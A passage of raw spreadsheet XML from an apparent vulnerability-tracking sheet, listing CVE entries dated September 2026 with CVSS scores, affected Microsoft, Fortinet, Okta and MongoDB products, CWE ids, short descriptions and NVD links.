r="O338" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P338" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q338" s="5" t="inlineStr" /><c r="R338" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S338" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T338" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69732</t></is></c></row><row r="339"><c r="A339" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B339" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C339" s="5" t="inlineStr"><is><t>CVE-2026-69782</t></is></c><c r="D339" s="5" t="n"><v>8.1</v></c><c r="E339" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F339" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G339" s="5" t="inlineStr" /><c r="H339" s="5" t="n"><v>0.006</v></c><c r="I339" s="5" t="inlineStr" /><c r="J339" s="5" t="inlineStr" /><c r="K339" s="5" t="inlineStr" /><c r="L339" s="5" t="inlineStr" /><c r="M339" s="5" t="inlineStr" /><c r="N339" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O339" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P339" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q339" s="5" t="inlineStr" /><c r="R339" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S339" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in DNS Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T339" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69782</t></is></c></row><row r="340"><c r="A340" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B340" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C340" s="5" t="inlineStr"><is><t>CVE-2026-69786</t></is></c><c r="D340" s="5" t="n"><v>8.1</v></c><c r="E340" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F340" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G340" s="5" t="inlineStr" /><c r="H340" s="5" t="n"><v>0.007</v></c><c r="I340" s="5" t="inlineStr" /><c r="J340" s="5" t="inlineStr" /><c r="K340" s="5" t="inlineStr" /><c r="L340" s="5" t="inlineStr" /><c r="M340" s="5" t="inlineStr" /><c r="N340" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O340" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P340" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q340" s="5" t="inlineStr" /><c r="R340" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S340" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T340" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69786</t></is></c></row><row r="341"><c r="A341" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B341" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C341" s="5" t="inlineStr"><is><t>CVE-2026-69813</t></is></c><c r="D341" s="5" t="n"><v>8.1</v></c><c r="E341" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F341" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G341" s="5" t="inlineStr" /><c r="H341" s="5" t="n"><v>0.007</v></c><c r="I341" s="5" t="inlineStr" /><c r="J341" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K341" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L341" s="5" t="inlineStr" /><c r="M341" s="5" t="inlineStr" /><c r="N341" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O341" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P341" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q341" s="5" t="inlineStr" /><c r="R341" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S341" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T341" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69813</t></is></c></row><row r="342"><c r="A342" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B342" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C342" s="5" t="inlineStr"><is><t>CVE-2026-69827</t></is></c><c r="D342" s="5" t="n"><v>8.1</v></c><c r="E342" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F342" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G342" s="5" t="inlineStr" /><c r="H342" s="5" t="n"><v>0.005</v></c><c r="I342" s="5" t="inlineStr" /><c r="J342" s="5" t="inlineStr" /><c r="K342" s="5" t="inlineStr" /><c r="L342" s="5" t="inlineStr" /><c r="M342" s="5" t="inlineStr" /><c r="N342" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O342" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P342" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q342" s="5" t="inlineStr" /><c r="R342" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S342" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in DNS Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T342" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69827</t></is></c></row><row r="343"><c r="A343" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B343" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C343" s="5" t="inlineStr"><is><t>CVE-2026-69858</t></is></c><c r="D343" s="5" t="n"><v>8.1</v></c><c r="E343" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F343" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G343" s="5" t="inlineStr" /><c r="H343" s="5" t="n"><v>0.007</v></c><c r="I343" s="5" t="inlineStr" /><c r="J343" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K343" s="5" t="inlineStr"><is><t>microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L343" s="5" t="inlineStr" /><c r="M343" s="5" t="inlineStr" /><c r="N343" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O343" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P343" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q343" s="5" t="inlineStr" /><c r="R343" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S343" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T343" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69858</t></is></c></row><row r="344"><c r="A344" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B344" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C344" s="5" t="inlineStr"><is><t>CVE-2026-69989</t></is></c><c r="D344" s="5" t="n"><v>8.1</v></c><c r="E344" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F344" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G344" s="5" t="inlineStr" /><c r="H344" s="5" t="n"><v>0.007</v></c><c r="I344" s="5" t="inlineStr" /><c r="J344" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K344" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L344" s="5" t="inlineStr" /><c r="M344" s="5" t="inlineStr" /><c r="N344" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O344" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P344" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q344" s="5" t="inlineStr" /><c r="R344" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S344" s="5" t="inlineStr"><is><t>Use after free in DNS Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T344" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69989</t></is></c></row><row r="345"><c r="A345" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B345" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C345" s="5" t="inlineStr"><is><t>CVE-2026-70342</t></is></c><c r="D345" s="5" t="n"><v>8.1</v></c><c r="E345" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F345" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G345" s="5" t="inlineStr" /><c r="H345" s="5" t="n"><v>0.008999999999999999</v></c><c r="I345" s="5" t="inlineStr" /><c r="J345" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3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5" s="5" t="inlineStr" /><c r="M345" s="5" t="inlineStr" /><c r="N345" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O345" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P345" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q345" s="5" t="inlineStr" /><c r="R345" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S345" s="5" t="inlineStr"><is><t>Use after free in Windows Ancillary Function Driver for WinSock allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="T345" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70342</t></is></c></row><row r="346"><c r="A346" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B346" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C346" s="5" t="inlineStr"><is><t>CVE-2026-70563</t></is></c><c r="D346" s="5" t="n"><v>8.1</v></c><c r="E346" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F346" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G346" s="5" t="inlineStr" /><c r="H346" s="5" t="n"><v>0.008999999999999999</v></c><c r="I346" s="5" t="inlineStr" /><c r="J346" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3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6" s="5" t="inlineStr" /><c r="M346" s="5" t="inlineStr" /><c r="N346" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O346" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P346" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q346" s="5" t="inlineStr" /><c r="R346" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S346" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Shell allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T346" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70563</t></is></c></row><row r="347"><c r="A347" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B347" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C347" s="5" t="inlineStr"><is><t>CVE-2026-72936</t></is></c><c r="D347" s="5" t="n"><v>8.1</v></c><c r="E347" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F347" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G347" s="5" t="inlineStr" /><c r="H347" s="5" t="n"><v>0.006</v></c><c r="I347" s="5" t="inlineStr" /><c r="J347" s="5" t="inlineStr" /><c r="K347" s="5" t="inlineStr" /><c r="L347" s="5" t="inlineStr" /><c r="M347" s="5" t="inlineStr" /><c r="N347" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O347" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P347" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q347" s="5" t="inlineStr" /><c r="R347" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S347" s="5" t="inlineStr"><is><t>Use after free in Windows SMB Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T347" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72936</t></is></c></row><row r="348"><c r="A348" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B348" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C348" s="5" t="inlineStr"><is><t>CVE-2026-72981</t></is></c><c r="D348" s="5" t="n"><v>8.1</v></c><c r="E348" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F348" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G348" s="5" t="inlineStr" /><c r="H348" s="5" t="n"><v>0.005</v></c><c r="I348" s="5" t="inlineStr" /><c r="J348" s="5" t="inlineStr" /><c r="K348" s="5" t="inlineStr" /><c r="L348" s="5" t="inlineStr" /><c r="M348" s="5" t="inlineStr" /><c r="N348" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O348" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P348" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q348" s="5" t="inlineStr" /><c r="R348" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S348" s="5" t="inlineStr"><is><t>Use after free in IP Helper allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T348" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72981</t></is></c></row><row r="349"><c r="A349" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B349" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C349" s="5" t="inlineStr"><is><t>CVE-2026-72987</t></is></c><c r="D349" s="5" t="n"><v>8.1</v></c><c r="E349" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F349" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G349" s="5" t="inlineStr" /><c r="H349" s="5" t="n"><v>0.006</v></c><c r="I349" s="5" t="inlineStr" /><c r="J349" s="5" t="inlineStr" /><c r="K349" s="5" t="inlineStr" /><c r="L349" s="5" t="inlineStr" /><c r="M349" s="5" t="inlineStr" /><c r="N349" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O349" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P349" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q349" s="5" t="inlineStr" /><c r="R349" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S349" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T349" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72987</t></is></c></row><row r="350"><c r="A350" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B350" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C350" s="5" t="inlineStr"><is><t>CVE-2026-73313</t></is></c><c r="D350" s="5" t="n"><v>8.1</v></c><c r="E350" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F350" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G350" s="5" t="inlineStr" /><c r="H350" s="5" t="n"><v>0.004</v></c><c r="I350" s="5" t="inlineStr" /><c r="J350" s="5" t="inlineStr" /><c r="K350" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L350" s="5" t="inlineStr" /><c r="M350" s="5" t="inlineStr" /><c r="N350" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O350" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P350" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q350" s="5" t="inlineStr" /><c r="R350" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S350" s="5" t="inlineStr"><is><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is></c><c r="T350" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73313</t></is></c></row><row r="351"><c r="A351" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B351" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C351" s="5" t="inlineStr"><is><t>CVE-2026-75021</t></is></c><c r="D351" s="5" t="n"><v>8.1</v></c><c r="E351" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F351" s="5" t="inlineStr"><is><t>ce714d77-add3-4f53-aff5-83d477b104bb</t></is></c><c r="G351" s="5" t="inlineStr" /><c r="H351" s="5" t="n"><v>0.004</v></c><c r="I351" s="5" t="inlineStr" /><c r="J351" s="5" t="inlineStr" /><c r="K351" s="5" t="inlineStr" /><c r="L351" s="5" t="inlineStr" /><c r="M351" s="5" t="inlineStr" /><c r="N351" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O351" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P351" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q351" s="5" t="inlineStr" /><c r="R351" s="5" t="inlineStr"><is><t>CWE-1327</t></is></c><c r="S351" s="5" t="inlineStr"><is><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is></c><c r="T351" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75021</t></is></c></row><row r="352"><c r="A352" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B352" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C352" s="5" t="inlineStr"><is><t>CVE-2026-77505</t></is></c><c r="D352" s="5" t="n"><v>8.1</v></c><c r="E352" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F352" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G352" s="5" t="inlineStr" /><c r="H352" s="5" t="n"><v>0.005</v></c><c r="I352" s="5" t="inlineStr" /><c r="J352" s="5" t="inlineStr" /><c r="K352" s="5" t="inlineStr" /><c r="L352" s="5" t="inlineStr" /><c r="M352" s="5" t="inlineStr" /><c r="N352" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O352" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P352" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q352" s="5" t="inlineStr" /><c r="R352" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S352" s="5" t="inlineStr"><is><t>Use after free in DNS Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T352" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77505</t></is></c></row><row r="353"><c r="A353" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B353" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C353" s="5" t="inlineStr"><is><t>CVE-2026-78444</t></is></c><c r="D353" s="5" t="n"><v>8.1</v></c><c r="E353" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F353" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G353" s="5" t="inlineStr" /><c r="H353" s="5" t="n"><v>0.005</v></c><c r="I353" s="5" t="inlineStr" /><c r="J353" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K353" s="5" t="inlineStr"><is><t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L353" s="5" t="inlineStr" /><c r="M353" s="5" t="inlineStr" /><c r="N353" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O353" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P353" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q353" s="5" t="inlineStr" /><c r="R353" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S353" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T353" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78444</t></is></c></row><row r="354"><c r="A354" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B354" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C354" s="5" t="inlineStr"><is><t>CVE-2026-78449</t></is></c><c r="D354" s="5" t="n"><v>8.1</v></c><c r="E354" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F354" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G354" s="5" t="inlineStr" /><c r="H354" s="5" t="n"><v>0.005</v></c><c r="I354" s="5" t="inlineStr" /><c r="J354" s="5" t="inlineStr" /><c r="K354" s="5" t="inlineStr" /><c r="L354" s="5" t="inlineStr" /><c r="M354" s="5" t="inlineStr" /><c r="N354" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O354" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P354" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q354" s="5" t="inlineStr" /><c r="R354" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S354" s="5" t="inlineStr"><is><t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T354" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78449</t></is></c></row><row r="355"><c r="A355" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B355" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C355" s="5" t="inlineStr"><is><t>CVE-2026-78450</t></is></c><c r="D355" s="5" t="n"><v>8.1</v></c><c r="E355" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F355" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G355" s="5" t="inlineStr" /><c r="H355" s="5" t="n"><v>0.005</v></c><c r="I355" s="5" t="inlineStr" /><c r="J355" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K355" s="5" t="inlineStr"><is><t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L355" s="5" t="inlineStr" /><c r="M355" s="5" t="inlineStr" /><c r="N355" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O355" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P355" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q355" s="5" t="inlineStr" /><c r="R355" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S355" s="5" t="inlineStr"><is><t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T355" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78450</t></is></c></row><row r="356"><c r="A356" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B356" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C356" s="5" t="inlineStr"><is><t>CVE-2026-78626</t></is></c><c r="D356" s="5" t="n"><v>8.1</v></c><c r="E356" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F356" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G356" s="5" t="inlineStr" /><c r="H356" s="5" t="n"><v>0.002</v></c><c r="I356" s="5" t="inlineStr" /><c r="J356" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K356" s="5" t="inlineStr" /><c r="L356" s="5" t="inlineStr" /><c r="M356" s="5" t="inlineStr" /><c r="N356" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O356" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P356" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q356" s="5" t="inlineStr" /><c r="R356" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S356" s="5" t="inlineStr"><is><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is></c><c r="T356" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78626</t></is></c></row><row r="357"><c r="A357" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B357" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C357" s="5" t="inlineStr"><is><t>CVE-2026-82066</t></is></c><c r="D357" s="5" t="n"><v>8.1</v></c><c r="E357" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F357" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G357" s="5" t="inlineStr" /><c r="H357" s="5" t="n"><v>0.002</v></c><c r="I357" s="5" t="inlineStr" /><c r="J357" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K357" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L357" s="5" t="inlineStr" /><c r="M357" s="5" t="inlineStr" /><c r="N357" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O357" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P357" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q357" s="5" t="inlineStr" /><c r="R357" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S357" s="5" t="inlineStr"><is><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is></c><c r="T357" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82066</t></is></c></row><row r="358"><c r="A358" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B358" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C358" s="5" t="inlineStr"><is><t>CVE-2026-83527</t></is></c><c r="D358" s="5" t="n"><v>8.1</v></c><c r="E358" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F358" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G358" s="5" t="inlineStr" /><c r="H358" s="5" t="n"><v>0.015</v></c><c r="I358" s="5" t="inlineStr" /><c r="J358" s="5" t="inlineStr" /><c r="K358" s="5" t="inlineStr" /><c r="L358" s="5" t="inlineStr" /><c r="M358" s="5" t="inlineStr" /><c r="N358" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O358" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P358" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q358" s="5" t="inlineStr" /><c r="R358" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="S358" s="5" t="inlineStr"><is><t>An Authentication Bypass vulnerability in Sentry before R10.8.2, R10.7.3 and R10.6.4 allows a remote unauthenticated attacker to gain administrative level access.</t></is></c><c r="T358" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83527</t></is></c></row><row r="359"><c r="A359" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B359" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C359" s="5" t="inlineStr"><is><t>CVE-2026-83997</t></is></c><c r="D359" s="5" t="n"><v>8.1</v></c><c r="E359" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F359" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G359" s="5" t="inlineStr" /><c r="H359" s="5" t="n"><v>0.005</v></c><c r="I359" s="5" t="inlineStr" /><c r="J359" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K359" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L359" s="5" t="inlineStr" /><c r="M359" s="5" t="inlineStr" /><c r="N359" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O359" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P359" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q359" s="5" t="inlineStr" /><c r="R359" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S359" s="5" t="inlineStr"><is><t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T359" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83997</t></is></c></row><row r="360"><c r="A360" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B360" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C360" s="5" t="inlineStr"><is><t>CVE-2026-84393</t></is></c><c r="D360" s="5" t="n"><v>8.1</v></c><c r="E360" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F360" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G360" s="5" t="inlineStr" /><c r="H360" s="5" t="n"><v>0.002</v></c><c r="I360" s="5" t="inlineStr" /><c r="J360" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K360" s="5" t="inlineStr" /><c r="L360" s="5" t="inlineStr" /><c r="M360" s="5" t="inlineStr" /><c r="N360" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O360" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P360" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q360" s="5" t="inlineStr" /><c r="R360" s="5" t="inlineStr"><is><t>CWE-297</t></is></c><c r="S360" s="5" t="inlineStr"><is><t>A improper validation of certificate with host mismatch vulnerability in Fortinet FortiOS 7.6.1 through 7.6.6, FortiProxy 7.6.2 through 7.6.6 may allow attacker to information disclosure via &lt;insert attack vector here&gt;</t></is></c><c r="T360" s="6" 